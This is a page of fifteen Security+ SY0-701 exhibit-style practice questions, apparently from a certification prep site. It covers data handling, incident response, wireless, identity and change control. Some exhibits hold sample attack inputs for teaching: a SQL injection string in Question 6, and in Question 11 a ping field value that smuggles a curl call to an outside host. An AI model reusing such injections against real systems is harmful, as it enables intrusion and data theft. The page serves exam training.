Scenario-based practice

Refer to the Exhibit Practice Questions

Practise Security+ SY0-701 questions: original exam-style scenarios covering every exam domain, with detailed explanations, wrong-answer analysis, and common exam traps.

15 scenario questions | Exam code: SY0-701 | Vendor: CompTIA

Scenario guide

How to approach "refer to the exhibit" practice questions

Practise exhibit-style questions that ask you to read a topology, table, command output or diagram before choosing the best answer.

Quick answer

Exhibit-style questions test whether you can read a topology, command output, diagram or table before choosing the best answer.

- How to extract the relevant detail from an exhibit.
- How topology, command output or routing information affects the answer.
- How to avoid answering from memory before reading the evidence.
- How to map the exhibit back to the exam objective.

Practice set

Practice scenarios

Question 1 (hard, multiple choice)

Based on the exhibit, what is the best handling decision for the requested file?

Exhibit

Data request:
File: customer_export.csv
Contents: full name, street address, SSN last 4, account balance, support notes
Requestor: external troubleshooting contractor

Policy excerpt:
- Internal: company staff only
- Confidential: encrypt in transit, approved recipients only
- Restricted: minimize, mask where possible, owner approval required, time-limited access, logged sharing
- Public: may be shared externally without restriction

Question 2 (hard, multiple choice)

Based on the exhibit, what additional control is the best fit?

Exhibit

Current controls on the finance share:
- SMB signing enabled
- Weekly access review
- Nightly backups to immutable storage
- Antivirus scans at 02:00

Incident: a valid VPN account was used to access 40,000 files in 8 minutes and copy them to a local drive.
Goal: detect unauthorized bulk access quickly before exfiltration completes.

Question 3 (medium, multiple choice)

Based on the exhibit, what is the best next control to prevent noncompliant mobile devices from accessing corporate email while still allowing IT to wipe company data from lost phones?

Exhibit

MDM dashboard excerpt:
- iOS device compliance: 84%
- Android device compliance: 79%
- Email app access policy: Allow if credentials are valid
- Noncompliance reasons: outdated OS, no passcode, jailbreak/root indicators
- Lost device action: Full factory reset only

Security request:
Block risky devices from email access and protect employee personal data on BYOD devices.

Question 4 (medium, multiple choice)

Based on the exhibit, what is the best response to the facilities manager's request?

Exhibit

Corporate privacy notice excerpt:
- Employee home addresses, personal phone numbers, and emergency contacts are collected for payroll, benefits, tax reporting, and emergency notification only.
- Access is limited to HR and Payroll unless a privacy review approves another purpose.

Ticket:
- Facilities manager requests an export of all employee home addresses and personal phone numbers to mail holiday gifts and parking passes.

Question 5 (hard, multiple choice)

Based on the exhibit, what is the best immediate action for the SOC or IR team?

A finance workstation shows evidence of a macro-launched script, followed by file renaming and lateral SMB traffic to two other hosts. The team has not yet determined the full scope of the incident.

Exhibit

Host: finance-lap07
10:22:11  winword.exe spawned powershell.exe -enc <redacted>
10:22:14  powershell.exe created C:\Users\ana\AppData\Roaming\rclone.exe
10:24:02  file rename activity: 184 files changed to *.locked
10:24:09  outbound SMB connections to 10.20.4.18 and 10.20.4.19
10:25:01  EDR status: endpoint still connected to corporate VPN
User report: 'My shared files stopped opening and the folder names changed.'

Question 6 (medium, multiple choice)

Based on the exhibit, what type of web attack is most likely taking place?

Exhibit

Web application log excerpt:

Request: GET /search?q=acme' OR '1'='1'-- HTTP/1.1
Response: 500 Internal Server Error
Database log: syntax error near "OR" at line 1
Developer note: the search feature appends user input directly into the SQL query string without parameterization.

Question 7 (easy, multiple choice)

Based on the exhibit, what wireless threat is most likely occurring?

Exhibit

Wireless scan from the lobby:
SSID: CorpWiFi       BSSID: 18:AA:10:22:44:60  Signal: -78 dBm
SSID: CorpWiFi       BSSID: 7C:22:90:11:33:AA  Signal: -41 dBm
SSID: CorpGuest      BSSID: 18:AA:10:22:44:61  Signal: -79 dBm
User report: "My tablet connected to CorpWiFi automatically, then a sign-in page appeared that looked different from our normal one."

Question 8 (medium, multiple choice)

Based on the exhibit, which integration best lets the SaaS application trust the company's existing identity provider so users can sign in with their corporate credentials?

Exhibit

SaaS sign-in settings:
- Local accounts: Enabled
- SAML SSO: Disabled
- SCIM provisioning: Disabled
- Password synchronization: Disabled
Requirement: users from the acquired subsidiary must use their existing corporate identities without separate SaaS passwords.

Question 9 (easy, multiple choice)

Based on the exhibit, what should the analyst do next to limit the impact of the suspected compromise?

Exhibit

EDR Alert Summary
Host: FIN-LT-22
Severity: High
Detection: Suspicious PowerShell with encoded command
Parent Process: winword.exe
Network Activity: outbound connection to 203.0.113.77:4444
User Note: 'The laptop is running very slowly and pop-ups started after opening an attachment.'

Question 10 (medium, multiple choice)

Based on the exhibit, which change would most improve the security of the stored password data?

Exhibit

Database sample

users.password_hash
--------------------------------
alex   5f4dcc3b5aa765d61d8327deb882cf99
mira   202cb962ac59075b964b07152d234b70
sam    098f6bcd4621d373cade4e832627b4f6

Developer note:
- Passwords are hashed before storage
- The application does not currently store any salt values

Question 11 (hard, multiple choice)

Based on the exhibit, what is the BEST remediation for the application flaw shown?

A user-controlled parameter is being passed to a shell command on the server. The application is intended to test connectivity to approved internal hosts only.

Exhibit

Application log excerpt:
15:08:02 POST /tools/pingHost host=10.0.0.15
15:08:02 Application executed: /bin/sh -c "ping -c 1 10.0.0.15"
15:09:11 POST /tools/pingHost host=10.0.0.15;curl%20http://198.51.100.55/s
15:09:11 Application executed: /bin/sh -c "ping -c 1 10.0.0.15;curl http://198.51.100.55/s"
15:09:12 Outbound HTTPS session established to 198.51.100.55

Question 12 (medium, multiple choice)

Based on the exhibit, what type of malware is the most likely issue on the workstation?

Exhibit

Help desk incident notes:

- User installed a free video converter from an unofficial download site.
- Browser home page changed without permission.
- A new extension appeared named "QuickSearch Helper".
- Outbound traffic to tracking.example-cdn.net increased every few minutes.
- The endpoint security console reports that saved browser cookies were accessed by an unknown process.

Question 13 (medium, multiple choice)

Based on the exhibit, which control should be enabled to mitigate this issue?

Exhibit

Packet Capture Summary
Host 10.20.30.44 sends repeated ARP replies:
  "10.20.30.1 is at 00:11:22:33:44:55"
  "10.20.30.1 is at 00:11:22:33:44:55"
Switch logs:
  DHCP snooping: disabled
  ARP inspection: disabled
Users report intermittent gateway connectivity and traffic sent to the wrong MAC address.

Question 14 (hard, multiple choice)

Based on the exhibit, which document type should be updated to make the approval and retention requirements mandatory across the organization?

Exhibit

Current document excerpt:
- Managers may approve external file sharing by email.
- Employees should keep the approval email in their inbox.
- Help desk records exceptions if time allows.
Audit note:
- No consistent evidence of approval or exception retention was found across departments.
Management objective:
- External sharing exceptions must be approved, retained, and auditable in a consistent way.

Question 15 (hard, multiple choice)

Based on the exhibit, what is the best next step before the hotfix is released?

Exhibit

Emergency change request CHG-8841
Service: Customer portal login API
Reason: critical authentication bug causing lockouts

Pipeline status:
- Code review: pending
- Automated unit tests: skipped to save time
- Integration tests: failed once and were not rerun
- Rollback plan: not documented
- Approval: verbal yes from operations supervisor
- Deployment window: 21:30-22:00 tonight

These SY0-701 practice questions are part of Courseiva's free CompTIA certification practice question bank. Courseiva provides original exam-style SY0-701 questions with detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics.